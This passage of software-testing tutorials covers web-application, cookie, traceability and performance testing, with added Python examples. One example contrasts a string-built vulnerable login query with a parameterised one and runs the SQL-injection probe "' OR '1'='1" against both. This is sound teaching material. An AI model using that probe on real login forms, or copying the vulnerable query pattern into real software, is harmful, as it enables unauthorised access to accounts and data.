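    return con.execute(sql).fetchone() is not None


def login_safe(con: sqlite3.Connection, name: str, pw_hash: str) -> bool:
    # Parameterised: the driver sends values separately from the SQL text,
    # so the input is compared as data and can never become SQL syntax.
    sql = "SELECT 1 FROM users WHERE name = ? AND pw_hash = ?"
    return con.execute(sql, (name, pw_hash)).fetchone() is not None


def search_titles(con: sqlite3.Connection, keyword: str) -> list[str]:
    """Parameterised LIKE search.  '%' and '_' in the keyword are escaped,
    so a user typing '100%' finds the literal '100%' rather than every row
    (scenarios 2 and 3), and the query itself cannot be altered."""
    escaped = keyword.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT title FROM products WHERE title LIKE ? ESCAPE '\\' ORDER BY title"
    return [row[0] for row in con.execute(sql, (f"%{escaped}%",))]


# The classic tautology probe a tester types into both fields: it should
# log in against the vulnerable query and be rejected by the safe one.
PROBE = "' OR '1'='1"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", login_vulnerable(con, PROBE, PROBE))
    print("safe:", login_safe(con, PROBE, PROBE))
    print("search '100%':", search_titles(con, "100%"))
```

The detection side of the same test is the database log: with the parameterised form the statement text never changes between requests, so an unexpected `OR` in a logged query is itself a finding.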
How to test Web Application:

To do web application testing effectively, we perform the following testing types or testing techniques depending on our test requirements.

1. Documentation Testing
2. Functionality Testing
3. Usability Testing
4. Interface Testing
5. Database Testing
6. Compatibility Testing
7. Performance Testing
8. Security Testing
9. Crowd Testing
Documentation Testing:

Poor documentation can affect the quality of the product. Good product documentation plays a critical role in the final product, so documentation testing has a vital role in Software Testing. Testing the documented artifacts that are developed prior to, during and after the testing of a product is known as documentation testing.

Some commonly used artifacts are as follows:

• Requirement documents
• Test Plan
• Test Cases
• Traceability Matrix (RTM)
Functionality Testing:

Functional testing verifies what the system actually does: that each function of the software application behaves as specified in the requirement document. It tests all the functionalities by providing appropriate input and checking whether the actual output matches the expected output or not. It is used for checking the workflows, all the links of the web pages, form testing, cookie testing, and the database connection.

Typically, functional testing includes the following tasks:

Testing UI Workflows:
A tester needs to test end-to-end workflows or business scenarios. Writing test scenarios or test cases is recommended to cover different scenarios and set pass criteria.

Testing HyperLinks (Link Testing):
A tester needs to ensure all the links on a website are working correctly and make sure there are no broken links. Types of links include Internal links, Outgoing links, Anchor links, etc.
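Link testing as described above (internal, outgoing and anchor links, and finding broken ones) can be automated by extracting the hrefs of a page and resolving them against the site. The following is an added example for this page, not code from the original tutorial; the page URL, the HTML fragment and the set of known site pages are constructed so the check runs offline, where a real run would request each URL and look at the status code:

```python
"""Added example (not from the original tutorial): a link checker that
extracts every <a href> from a page, classifies it as an internal,
outgoing or anchor link (the three types named above), and reports
internal links that point at pages missing from a constructed site map.
The URL, HTML and site map are constructed sample input."""
from __future__ import annotations
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LinkExtractor(HTMLParser):
    """Collect the href of every <a> tag in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def classify_links(page_url: str, html: str) -> dict[str, list[str]]:
    """Group hrefs into 'anchor', 'internal' and 'outgoing'.  Relative
    hrefs are resolved against the page URL before the host comparison."""
    parser = LinkExtractor()
    parser.feed(html)
    site = urlsplit(page_url).netloc
    groups: dict[str, list[str]] = {"anchor": [], "internal": [], "outgoing": []}
    for href in parser.hrefs:
        if href.startswith("#"):
            groups["anchor"].append(href)      # same-page anchor link
            continue
        absolute = urljoin(page_url, href)
        kind = "internal" if urlsplit(absolute).netloc == site else "outgoing"
        groups[kind].append(absolute)
    return groups


def broken_internal_links(page_url: str, html: str, known_pages: set[str]) -> list[str]:
    """Internal link paths (fragment and query dropped) that are not in the
    site's known page set; offline stand-in for checking the HTTP status."""
    links = classify_links(page_url, html)["internal"]
    return sorted({urlsplit(u).path for u in links} - known_pages)


# Constructed sample input: one page of a fictional shop and its site map.
SAMPLE_PAGE_URL = "https://shop.example/catalog"
SAMPLE_HTML = """
<a href="/">Home</a>
<a href="/cart">Cart</a>
<a href="help/faq#returns">FAQ</a>
<a href="#top">Back to top</a>
<a href="https://partner.example/deals">Partner</a>
<a href="/old-promo">Old promo</a>
"""
SAMPLE_SITE_MAP = {"/", "/catalog", "/cart", "/help/faq"}

if __name__ == "__main__":
    for kind, urls in classify_links(SAMPLE_PAGE_URL, SAMPLE_HTML).items():
        print(kind, urls)
    print("broken:", broken_internal_links(SAMPLE_PAGE_URL, SAMPLE_HTML, SAMPLE_SITE_MAP))
```

Outgoing links are listed separately because they are checked differently: a third-party host that has gone away or changed owner is a content problem, and for a security review also a question of what the site now links users to.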
Forms Testing (Input field validation):
Forms are used for interactive communication with end users. A tester needs to ensure all the forms are working as expected.

Forms testing includes:

• Verify whether the default values are being populated
• Verify whether an error message is shown when a user does not fill a mandatory field
• Verify whether the form is accepting invalid values or not
• Verify whether the forms are optimally formatted for better readability
• Verify whether the AJAX fields are populating the values correctly at run time
• Verify whether the drop-down lists are loading with options

Cookie Testing:
A Cookie is a small piece of information sent from a website and stored on the user’s hard drive (in a text file) by the user’s web browser while the user is browsing, and is sent back to the website each time the browser requests a page from the website.

Cookie Testing is the process of verifying whether the cookies are working as intended or not. In cookie testing, testers need to test the status of the cookie, expiration of the cookie, accessibility of the cookie, security constraints, etc.
Validate HTML and CSS:
A tester needs to check whether a site has a clean HTML structure and optimized CSS as per W3C standards, and that search engines can crawl the site easily.

• Verify HTML syntax errors
• Verify color schemas are readable
• Verify whether the sitemap is accurate

Useful tools to perform functional website testing are Selenium, IBM Rational, UFT, etc.

Usability Testing:
Usability testing verifies whether the application is user-friendly and can be used comfortably by an end user. The main focus of this testing is to check whether the end user can understand and operate the application easily. An application should be self-explanatory and must not require training to operate it.

Usability testing is performed by testers internally or by getting external testers (a small focus group) that fit the target audience of the web application.

Usability testing involves testing the site navigation and testing the content.

Test the site navigation:
Navigation testing includes:

• All pages of your site are understandable and easy to use
• Menus, buttons and links are easily visible and consistent on all webpages

Test the Content:
Content testing checklist:

• There are no grammar and spelling mistakes
• Images should contain an “alt” text
• Content should be informative, understandable, and logically linked

Interface Testing:
Interface testing checks whether the web server and application server, and the application server and database server, interact properly. It ensures a positive user experience. It includes verifying the communication processes as well as making sure that error messages are displayed correctly.

Database Testing:
It is also known as back-end testing or data testing.

Database testing involves verifying the integrity of the data in the front end against the data present in the back end. It validates the schema, database tables, columns, indexes, stored procedures, triggers, data duplication, orphan records and junk records. It involves updating records in a database and verifying the same on the front end.

Database testing includes the following:

• Data validity testing
• Data integrity testing
• Database performance testing
• Testing of procedures, triggers, and functions

Compatibility Testing:
Compatibility testing ensures that an application is compatible across different browsers and on a variety of devices.

Browser Compatibility Testing:
Cross browser testing is a type of non-functional test which helps us ensure that our website or web application works as expected in various web browsers.

While testing a website, we need to ensure that our website appears the same across all the browsers. To do this we would need to have all the browsers. Fortunately, there are some tools to perform cross-browser testing without testing each browser individually in a manual way.

We need to provide the same experience for users no matter what type of OS or browser they are using. Not everyone uses the same environment. Even though Google Chrome is the most popular one in the current market, many users still use Mozilla Firefox, Safari and others. If a website doesn't function properly on a particular browser, the user experience suffers.

Device Compatibility Testing:
This test confirms that the web application is responsive and works on devices of different sizes and different operating systems.

Performance Testing:
In software, performance testing (also called perf testing) determines or validates the speed, scalability, and/or stability characteristics of the system or application under test. Performance is concerned with achieving response times, throughput, and resource-utilization levels that meet the performance objectives for the project or product.

Web application performance testing is conducted to mitigate the risks to availability, reliability, scalability, responsiveness, stability, etc. of a system.

Performance testing encompasses a number of different types of testing like load testing, volume testing, stress testing, capacity testing, soak/endurance testing and spike testing, each of which is designed to uncover or solve performance problems in a system.

Capacity Testing:
Capacity testing determines how many users a system/application can handle successfully before the performance goals become unacceptable. This allows us to avoid potential problems in the future such as an increased user base or an increased volume of data. It helps identify a scaling strategy, i.e. whether a system should scale up or scale out. It is done mainly for sites such as eCommerce and banking sites. This testing is sometimes called scalability testing.

Load Testing:
Load testing verifies that a system/application can handle the expected number of transactions and verifies the system/application behavior under both normal and peak load conditions (number of users).

Volume Testing:
Volume testing verifies whether a system/application can handle a large amount of data. This testing focuses on the database. A performance tester who does volume testing has to populate a huge volume of data in a database and monitor the behavior of the system.

Stress Testing:
Stress testing verifies the behavior of the system once the load increases beyond the system's design expectations. This testing identifies which components fail first when we stress the system by applying load beyond the design expectations, so that we can design a more robust system.

Soak/Endurance Testing:
Soak testing is also known as endurance testing. Running a system at high load for a prolonged period of time to identify performance problems is called soak testing. It makes sure the software can handle the expected load over a long period of time.

Spike Testing:
Spike testing determines the behavior of the system under a sudden increase of load (a large number of users) on the system.

Read more on Performance Testing here


Security Testing:
Security testing is a process to determine whether the system protects data and maintains functionality as intended. It aims to find all possible loopholes and weaknesses of the system at an early stage, to avoid inconsistent system performance, unexpected breakdowns, loss of information, loss of revenue and loss of customers' trust.

Security tests include testing for vulnerabilities such as:

• SQL Injection
• Cross-Site Scripting (XSS)
• Session Management
• Broken Authentication
• Cross-Site Request Forgery (CSRF)
• Security Misconfiguration
• Failure to Restrict URL Access
• Sensitive Data Exposure
• Insecure Direct Object Reference
• Missing Function Level Access Control
• Using Components with Known Vulnerabilities
• Unvalidated Redirects and Forwards

Read more on Security Testing here

Crowd Testing or Crowdsourced Testing:
Crowd testing or crowdsourced testing is an emergent trend in
Software Testing which leverages a crowd (a large number of people)
to test software applications quickly and effectively. Usually, testing is
done by in-house software testers or outsourced QA consultants
whereas crowdsourced testing is done by a community of expert QAs
around the world through an online crowdsourced platform.

Conclusion:
Hope you have found the answer to the question “how to test a
website” and it helps you build a better plan for website testing. If you
have any questions, please leave a comment in the comment section
below.

Learn Website Cookie Testing – Complete Guide [Cookie Testing Test Cases] | SoftwareTestingMaterial

Website Cookie Testing
In this Cookie Testing Tutorial, we will see what is a cookie, what is the role
of cookies in web application and how to write test cases to test web
application cookies. As a Software Tester, we need to test cookies
whenever we test websites. In this tutorial, we will see some tools to test
cookies and tools to test whether your local system is accepting cookies or
not and also a tool to test whether any particular domain is accepting
cookies or not.

• 1. What is a Cookie
• 2. How do Cookies work
• 3. Types of Cookies
• 4. Where Are Cookies Stored In Different Browsers
• 5. Cookie Testing
• 6. How to test Cookies – Sample Test Cases for Web Application Cookie Testing
• 7. Plugins To Test Cookies

What is a Cookie?
A cookie is also known as an HTTP cookie, web cookie, internet cookie or browser cookie.

A cookie is a small piece of information sent from a website and stored on the user's hard drive (in a text file) by the user's web browser while the user is browsing; it is sent back to the website each time the browser requests a page from that website.

Cookies were designed to track the user's browsing activities such as login credentials and visited pages, to store stateful information such as items added to the shopping cart in an online store, or to record the information the user filled into form fields such as name, card details, address details etc. So a cookie stores personalized information such as login details, language preference, mobile or desktop version preference etc. Usually cookies store information for shorter periods. Cookies are used while implementing user sessions, user tracking, advertisements, shopping carts etc.

How do Cookies work?
Assume there is a website which is served in two languages, say English and Burmese. The website opens in Burmese by default and allows users to change the language to English to view the site in English. Suppose you are an English speaker who always wants to view the website in English. If the website uses cookies to store the language, then once you change the language from Burmese to English, the site will load in English whenever you come back. Here the cookie stored on your local system is sent to the web server with each request, so the server responds with the English version of the page and your browser loads it in English.

Remember there will be an expiration time for cookies. Expiration time varies from website to website and it is set while writing the cookie code.

Cookies contain attributes such as the domain name (from where the cookie was sent), a random value (which is a unique number), the lifetime of the cookie (Expires and Max-Age), and the path of the cookie.

Types of Cookies:
Usually, there are two types of cookies.

Session Cookies:
As the name suggests, session cookies work until the session has been destroyed. This type of cookie lasts until the browser that created the cookie is closed.

It is also called an in-memory cookie or transient cookie. Session cookies do not have an expiration date assigned to them.

In simple words, it is stored in temporary memory which expires once you close your browser.

Persistent Cookies:
Persistent cookies continue to exist until their time runs out. These cookies are stored on the user's hard disk for days, months or years, depending on the cookie creator. These cookies are used to track the user's browsing activities. They are also called tracking cookies and are used for legitimate purposes such as keeping you logged into an account without re-entering your account details, or displaying advertisements based on the user's previous browsing history.

Where Are Cookies Stored In Different Browsers?
Cookies are stored on the user's system in a location that depends on the browser.

Chrome: Settings – Advanced – Privacy and security – Content Settings – Cookies – See all cookies and site data
Firefox: Open Firefox and click on Hamburger menu – Go to Options – Privacy – Remove individual cookies
Internet Explorer: Internet options – Settings – Temporary Internet Files – View files
Safari: Edit – Preferences – Privacy – Details – Manage website data

Cookie Testing:
Cookie Testing is the process of verifying whether the cookies are
working as intended or not. In cookie testing, testers need to test the
status of the cookie, expiration of cookie, accessibility of cookie,
security constraints, etc.,


How to test Cookies – Sample Test Cases for Web Application Cookie Testing:
Important test scenarios for testing the cookies of a web application are listed below. You can use this cookie testing checklist to do cookie testing.

1. Verify whether the application is creating cookies on disk.
2. Verify whether the user is able to access the application after disabling the cookies.
Disabling Cookies: Web pages may crash if we disable the cookies. Disable cookies on your browser and access the website after all the cookies are disabled. There shouldn't be any crashes or blockers.
Here you need to verify two things:
i. Is there an appropriate message telling the user to enable cookies to access the site?
ii. Is there any workaround to access the site for browsers with cookies disabled?
3. Verify whether the user is able to access the application after removing the cookies.
Removing Cookies: Remove all the cookies related to the website you are testing and check whether the website is working without any crash. Removal of cookies may result in loss of data and lead to a system crash.
4. Verify whether the user is able to access the application after deleting the cookies.
Deleting Cookies: Make sure your website is creating cookies. Once the cookie is created, close the browser and delete the cookies manually. Now open the browser, navigate to the website and test its behavior. Deleting the cookies may sometimes break the website.
5. Verify whether the user is able to access the application after corrupting (by editing) the cookies.
Corrupting Cookies: Manually edit the cookie using any plugin. You can also open cookies using Notepad; earlier we mentioned where cookies are stored. Change the values of the cookies (such as the expiry date or the name of the cookie) to irrelevant data.
Try to change the login credentials of a user in the cookie to those of another valid user and try to log in. The system shouldn't allow you to log in with the modified user details.
6. Verify whether all the sensitive data (user credentials) stored in a cookie is encrypted or not. (Cookie Encryption)
7. Verify whether the cookies are being written correctly on all supported browsers. (Cross Browser Testing)
8. Verify that the user is able to access the site without accepting all the cookies.
Accept or Reject Cookies: Make sure your browser is writing cookies. Access the website and allow the browser to write cookies. Now disable the cookies and try to access the site. Doing this may crash your site.
9. Verify that there is no overuse of cookies.
No Overuse of Cookies: Overuse of cookies brings the site traffic down. Also, prompting for cookies too often irritates users. Ultimately your site will lose traffic, and loss of traffic brings your business down.
10. Verify that no personal or sensitive data is stored in the cookie.
Privacy testing: In some cases, websites collect personal or sensitive data and store it in cookies. Make sure that any personal or sensitive data stored in a cookie is in an encrypted format.
If you have come across any other test scenarios of website cookie
testing, please mention it in the comments below.
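Several items of the checklist above (expiry, security constraints, encrypted credentials, overuse of cookies) can be checked automatically from a response's Set-Cookie headers. The script below is an added example, not code from the tutorial; the sensitive-name list, the size and count limits and the sample headers are assumptions constructed for it.

```python
"""Set-Cookie checker for the cookie test cases above.

Added example, not the tutorial's own code. It parses Set-Cookie response
headers (RFC 6265 syntax) and reports what the checklist asks a tester to
verify: lifetime (session vs persistent vs already expired), the Secure,
HttpOnly and SameSite attributes, credentials kept in a cookie in clear
text, and overuse (cookie count and size). The headers at the bottom are
constructed sample input, not captured from a real site.
"""
from dataclasses import dataclass, field
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Dict, List, Optional

# Cookie names that indicate a credential or card data (assumed list for this example).
SENSITIVE_NAMES = {"password", "passwd", "pwd", "card", "cardnumber", "cvv"}
MAX_COOKIE_BYTES = 4096   # per-cookie size browsers are guaranteed to store
MAX_COOKIES = 50          # per-domain cookie count browsers are guaranteed to keep


@dataclass
class Cookie:
    name: str
    value: str
    attrs: Dict[str, str] = field(default_factory=dict)  # attribute names lower-cased


def parse_set_cookie(header: str) -> Cookie:
    """Split 'name=value; Attr=val; Flag' into a Cookie; flags get the value ''."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name.strip(), value.strip())
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            cookie.attrs[key.strip().lower()] = val.strip()
    return cookie


def lifetime(cookie: Cookie, now: Optional[datetime] = None) -> str:
    """Classify as 'session', 'persistent', 'expired' or 'malformed'.

    Max-Age wins over Expires, as browsers do; a past Expires or Max-Age <= 0
    means the server is deleting the cookie rather than setting it.
    """
    now = now or datetime.now(timezone.utc)
    if "max-age" in cookie.attrs:
        try:
            return "persistent" if int(cookie.attrs["max-age"]) > 0 else "expired"
        except ValueError:
            return "malformed"
    if "expires" in cookie.attrs:
        try:
            expires = parsedate_to_datetime(cookie.attrs["expires"])
        except (TypeError, ValueError):
            return "malformed"
        if expires.tzinfo is None:
            expires = expires.replace(tzinfo=timezone.utc)
        return "persistent" if expires > now else "expired"
    return "session"


def audit_cookie(cookie: Cookie, now: Optional[datetime] = None) -> List[str]:
    """Return the findings for one cookie; an empty list means it passes."""
    findings = []
    attrs = cookie.attrs
    if "secure" not in attrs:
        findings.append("missing Secure: cookie may be sent over plain HTTP")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: cookie is readable from page scripts")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: cookie is sent on cross-site requests")
    kind = lifetime(cookie, now)
    if kind in ("expired", "malformed"):
        findings.append(f"{kind} expiry attribute")
    if cookie.name.lower() in SENSITIVE_NAMES:
        findings.append("credential or card data stored in a cookie")
    if len(cookie.name) + len(cookie.value) > MAX_COOKIE_BYTES:
        findings.append("cookie larger than browsers will store")
    return findings


def audit_response(headers: List[str], now: Optional[datetime] = None) -> Dict[str, List[str]]:
    """Audit every Set-Cookie header of one response; keys are cookie names."""
    cookies = [parse_set_cookie(h) for h in headers]
    report = {c.name: audit_cookie(c, now) for c in cookies}
    if len(cookies) > MAX_COOKIES:
        report["_response"] = [f"{len(cookies)} cookies set; browsers keep about {MAX_COOKIES}"]
    return report


# Constructed sample headers: a sound session cookie, a preference cookie
# without security flags, and a credential cookie with a past Expires date.
SAMPLE_HEADERS = [
    "sessionid=3f9a1c; Path=/; Secure; HttpOnly; SameSite=Lax",
    "lang=en; Path=/; Max-Age=31536000; SameSite=Lax",
    "password=hunter2; Path=/; Expires=Wed, 01 Jan 2020 00:00:00 GMT",
]
FIXED_NOW = datetime(2024, 1, 1, tzinfo=timezone.utc)  # fixed clock for reproducible output

if __name__ == "__main__":
    for name, findings in audit_response(SAMPLE_HEADERS, FIXED_NOW).items():
        print(f"{name}: {findings or 'OK'}")
```

Run it against the headers captured from your own application's login and preference responses; each non-empty findings list maps back to one of the checklist items above.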

Plugins To Test Cookies:
For Google Chrome users: the extension “Edit this cookie”
For Mozilla Firefox users: Mozilla Advanced Cookie Manager

Some other tools to test the cookies:

Cookie Tester
This site is used to test your browser's cookie-related settings. You can request this site to send a cookie to your browser. If you've configured your browser to reject cookies, you can request this site to send a cookie to the browser and check if the cookie gets rejected. If you've configured your browser to accept cookies, you can use this page to make sure that the cookies are being sent and aren't getting blocked.

• Set the cookie name and value
• Click on ‘Set TestCookie’

If you have disabled cookies then the cookie should be rejected.

Cookie Checker
This site checks the cookies from a site and gives a full report on the
purpose of each cookie.

Conclusion
The purpose of a cookie is to identify users, to save login information for a website or to prepare customized web pages. Cookies save users time when they revisit the site. Cookie testing is quite common and important in terms of security and quick access to any web application. As a web application tester, you have to include cookie testing as a part of your test plan.
Like this post? Share it with your friends! If you have any queries, please comment below.
Requirements Traceability Matrix (RTM) | SoftwareTestingMaterial
What is Requirement Traceability Matrix?
Requirements Traceability Matrix (RTM) is used to trace the requirements to the tests that are needed to verify whether the requirements are fulfilled. A Requirement Traceability Matrix is also known as a Traceability Matrix or Cross Reference Matrix.

Advantages of Requirements Traceability Matrix (RTM):
1. 100% test coverage
2. It helps identify missing functionality easily
3. It helps identify the test cases which need to be updated in case of a change in a requirement
4. It is easy to track the overall test execution status

How to prepare Requirement Traceability Matrix (RTM):
• Collect all the available requirement documents.
• Assign a unique Requirement ID to each and every requirement.
• Create test cases for each and every requirement and link the Test Case IDs to the respective Requirement ID.

Like all other test artifacts, the RTM varies between organizations. Most organizations use just the Requirement IDs and Test Case IDs in the RTM. It is possible to add other fields such as Requirement Description, Test Phase, Test Case Result, Document Owner etc. It is necessary to update the RTM whenever there is a change in a requirement.
The following illustration gives you a basic idea about the Requirement Traceability Matrix (RTM).

Assume we have 5 requirements.
Assume the total number of test cases identified is 10.

Whenever we write new test cases, the same need to be updated in the RTM: for example, adding a new test case id TID011 and mapping it to the requirement id BID005.


Types of Requirements Traceability Matrix (RTM):
Let's see the different types of Traceability Matrix:
• Forward Traceability: Mapping requirements to test cases is
called Forward Traceability Matrix. It is used to ensure whether
the project progresses in the desired direction. It makes sure
that each requirement is tested thoroughly.
• Backward or Reverse Traceability: Mapping test cases to
requirements is called Backward Traceability Matrix. It is used to
ensure whether the current product remains on the right track. It
makes sure that we are not expanding the scope of the project
by adding functionality that is not specified in the requirements.
• Bi-directional traceability (Forward + Backward): Mapping
requirements to test cases (forward traceability) and test
cases to requirements (backward traceability) is called Bi-
directional Traceability Matrix. It is used to ensure that all the
specified requirements have appropriate test cases and vice
versa.
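Forward, backward and bi-directional traceability, written out as a small check over an RTM. This is an added example, not the tutorial's own template: the requirement texts, the TID/BID mappings, the TID010 orphan and the helper names are constructed for it.

```python
"""Bi-directional traceability check for an RTM.

Added example, not the tutorial's own code or template. It builds the forward
matrix (requirement -> test cases), reports forward gaps (requirements with no
test case), backward gaps (test cases that trace to no listed requirement,
i.e. untracked scope), coverage, and the test cases impacted when a
requirement changes. The BID/TID identifier style follows the tutorial's
illustration; the requirements and mappings themselves are constructed.
"""
from typing import Dict, Iterable, List, Set

Requirements = Dict[str, str]    # requirement id -> short description
TestCases = Dict[str, Set[str]]  # test case id -> requirement ids it verifies


def forward_matrix(reqs: Requirements, tests: TestCases) -> Dict[str, List[str]]:
    """Forward traceability: each requirement with the sorted test ids covering it."""
    matrix: Dict[str, List[str]] = {rid: [] for rid in reqs}
    for tid, covered in tests.items():
        for rid in covered:
            if rid in matrix:
                matrix[rid].append(tid)
    return {rid: sorted(tids) for rid, tids in matrix.items()}


def untested_requirements(reqs: Requirements, tests: TestCases) -> List[str]:
    """Forward gap: requirements no test case traces to."""
    return sorted(rid for rid, tids in forward_matrix(reqs, tests).items() if not tids)


def orphan_tests(reqs: Requirements, tests: TestCases) -> List[str]:
    """Backward gap: test cases that trace to nothing, or to an unknown requirement id."""
    known = set(reqs)
    return sorted(tid for tid, covered in tests.items() if not covered or not covered <= known)


def impacted_tests(tests: TestCases, changed_rid: str) -> List[str]:
    """Test cases to revisit when one requirement changes (RTM advantage 3 above)."""
    return sorted(tid for tid, covered in tests.items() if changed_rid in covered)


def coverage_percent(reqs: Requirements, tests: TestCases) -> float:
    """Share of requirements with at least one test case."""
    if not reqs:
        return 0.0
    covered = len(reqs) - len(untested_requirements(reqs, tests))
    return round(100.0 * covered / len(reqs), 1)


def add_test_case(tests: TestCases, tid: str, rids: Iterable[str]) -> TestCases:
    """Return an updated copy: new test cases must be added to the RTM as well."""
    updated = {t: set(r) for t, r in tests.items()}
    updated[tid] = set(rids)
    return updated


def render(reqs: Requirements, tests: TestCases) -> str:
    """Plain-text RTM with one requirement per line, as most organizations keep it."""
    lines = []
    for rid, tids in forward_matrix(reqs, tests).items():
        lines.append(f"{rid}  {reqs[rid]:<28} {', '.join(tids) or '<untested>'}")
    return "\n".join(lines)


# Constructed sample: 5 requirements and 10 test cases, as in the illustration.
REQUIREMENTS: Requirements = {
    "BID001": "User can register",
    "BID002": "User can log in",
    "BID003": "User can reset password",
    "BID004": "User can update profile",
    "BID005": "User can delete account",
}
TEST_CASES: TestCases = {
    "TID001": {"BID001"}, "TID002": {"BID001"},
    "TID003": {"BID002"}, "TID004": {"BID002"}, "TID005": {"BID002", "BID003"},
    "TID006": {"BID003"},
    "TID007": {"BID004"}, "TID008": {"BID004"}, "TID009": {"BID004"},
    "TID010": {"BID007"},  # traces to a requirement id that does not exist
}

if __name__ == "__main__":
    print(render(REQUIREMENTS, TEST_CASES))
    print("untested:", untested_requirements(REQUIREMENTS, TEST_CASES))
    print("orphans:", orphan_tests(REQUIREMENTS, TEST_CASES))
    updated = add_test_case(TEST_CASES, "TID011", ["BID005"])  # the tutorial's update
    print("coverage after TID011:", coverage_percent(REQUIREMENTS, updated), "%")
```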
Performance Testing Tutorial | Software Testing Material

In the field of Software Testing, Testers mainly concentrate on Black
Box and White Box Testing. Under the Black Box testing, again there are
different types of testing. The major types of testing are Functionality testing
and Non-functional testing. Performance testing and types of performance
testing fall under Non-functional testing.
What is Performance Testing?
In software, performance testing (also called perf testing) determines or validates the speed, scalability, and/or stability characteristics of the system or application under test. Performance is concerned with achieving response times, throughput, and resource-utilization levels that meet the performance objectives for the project or product.

Web application performance testing is conducted to mitigate the risks to availability, reliability, scalability, responsiveness, stability etc. of a system.

Performance testing encompasses a number of different types of testing like load testing, volume testing, stress testing, capacity testing, soak/endurance testing and spike testing, each of which is designed to uncover or solve performance problems in a system.

Why Performance Testing?
In the current market, the performance and responsiveness of applications play an important role in the success of a business. We conduct performance testing to address the bottlenecks of the system and to fine-tune the system by finding the root cause of performance issues. Performance testing answers questions like how many users the system can handle, how well the system recovers when the number of users exceeds the maximum, and what the response time of the system is under normal and peak loads.

We use performance testing tools to measure the performance of a system or application under test (AUT) and to help release high-quality software; it is not done to find defects in an application.

Load and performance testing will determine whether an application meets speed, scalability, and stability requirements under expected workloads.

Speed: It determines whether an application responds quickly
Scalability: It determines the maximum load an application can handle
Stability: It determines whether an application is stable under varying loads

Poorly performing applications gain a bad reputation and fail to meet the expected goals. So performance testing of an application is very important.

Types of Performance Testing

Capacity Testing:
Capacity testing determines how many users a system/application can handle successfully before the performance goals become unacceptable. This allows us to avoid potential problems in the future such as an increased user base or an increased volume of data. It helps identify a scaling strategy, i.e. whether a system should scale up or scale out. It is done mainly for sites such as eCommerce and banking sites. This testing is sometimes called scalability testing.

Load Testing:
Load testing verifies that a system/application can handle the expected number of transactions and verifies the system/application behavior under both normal and peak load conditions (number of users).

Volume Testing:
Volume testing verifies whether a system/application can handle a large amount of data. This testing focuses on the database. A performance tester who does volume testing has to populate a huge volume of data in a database and monitor the behavior of the system.

Stress Testing:
Stress testing verifies the behavior of the system once the load increases beyond the system's design expectations. This testing identifies which components fail first when we stress the system by applying load beyond the design expectations, so that we can design a more robust system.

Soak/Endurance Testing:
Soak testing is also known as endurance testing. Running a system at high load for a prolonged period of time to identify performance problems is called soak testing. It makes sure the software can handle the expected load over a long period of time.

Spike Testing:
Spike testing determines the behavior of the system under a sudden increase of load (a large number of users) on the system.

Read more: Types of Performance Testing & 100+ Types of Software Testing
Difference between Functional Testing and Non-functional Testing?

| Functional Testing | Non-functional Testing |
| --- | --- |
| What the system actually does is functional testing | How well the system performs is non-functional testing |
| To ensure that your product meets customer and business requirements and doesn't have any major bugs | To ensure that the product stands up to customer expectations |
| To verify the accuracy of the software against expected output | To verify the behavior of the software at various load conditions |
| It is performed before non-functional testing | It is performed after functional testing |
| An example of a functional test case is to verify the login functionality | An example of a non-functional test case is to check whether the homepage loads in less than 2 seconds |
| Testing types are: Unit testing, Smoke testing, User Acceptance, Integration Testing, Regression testing, Localization, Globalization, Interoperability | Testing types are: Performance Testing, Volume Testing, Scalability, Usability Testing, Load Testing, Stress Testing, Compliance Testing, Portability Testing, Disaster Recovery Testing |
| It can be performed either in a manual or an automated way | It can be performed efficiently if automated |

Difference between Performance Testing, Load Testing & Stress Testing
Performance Testing:
In software, performance testing (also called perf testing) determines or validates the speed, scalability, and/or stability characteristics of the system or application under test. Performance is concerned with achieving response times, throughput, and resource-utilization levels that meet the performance objectives for the project or product.

Performance testing is conducted to mitigate the risks to availability, reliability, scalability, responsiveness, stability etc. of a system.

Performance testing encompasses a number of different types of testing like load testing, volume testing, stress testing, capacity testing, soak/endurance testing and spike testing, each of which is designed to uncover or solve performance problems in a system.

Load Testing:
Load testing verifies that a system/application can handle the expected number of transactions and verifies the system/application behavior under both normal and peak load conditions (number of users).

Stress Testing:
Stress testing verifies the behavior of the system once the load increases beyond the system's design expectations. This testing identifies which components fail first when we stress the system by applying load beyond the design expectations, so that we can design a more robust system.

| Performance Testing | Load Testing | Stress Testing |
| --- | --- | --- |
| It is a superset of load and stress testing | It is a subset of performance testing | It is a subset of performance testing |
| The goal of performance testing is to set the benchmark and standards for the application | The goal of load testing is to identify the upper limit of the system, set the SLA of the app and check how the system handles heavy load | The goal of stress testing is to find how the system behaves under extreme loads and how it recovers from failure |
| Load limit is both below and above the threshold of a break | Load limit is the threshold of a break | Load limit is above the threshold of a break |
| The attributes checked in performance testing are speed, response time, resource usage, stability, reliability and throughput | The attributes checked in load testing are peak performance, server throughput, response time under various load levels, load balancing requirements etc. | The attributes checked in stress testing are stability, response time, bandwidth capacity etc. |


Difference between Performance Engineering & Performance Testing?
Performance engineering is a discipline that includes best practices and activities during every phase of the software development life cycle (SDLC) in order to test and tune the application with the intent of realizing the required performance.

Performance testing simulates the realistic end-user load to determine the speed, responsiveness, and stability of the system. It is concerned with testing and reporting the current performance of an application under various parameters such as response time, concurrent user load, server throughput etc.

Performance Testing Process
Identify the test environment:
Identify the physical test environment and the production environment, and know what testing tools are available. Before beginning the testing process, understand the details of the hardware, software and network configurations. This process must be revisited periodically throughout the project's life cycle.

Identify performance acceptance criteria:
This includes goals and constraints for response time, throughput and resource utilization. Response time is a user concern, throughput is a business concern, and resource utilization is a system concern. It is also necessary to identify project success criteria that may not be captured by those goals and constraints.

Plan & Design performance tests:
Identify key scenarios to test for all possible use cases. Determine how to simulate that variability, define test data, and establish the metrics to be gathered.

Configure the Test Environment:
Prepare the test environment, and arrange tools and other resources before execution.

Implement the Test Design:
Develop the performance tests in accordance with the test design.

Execute the Test:
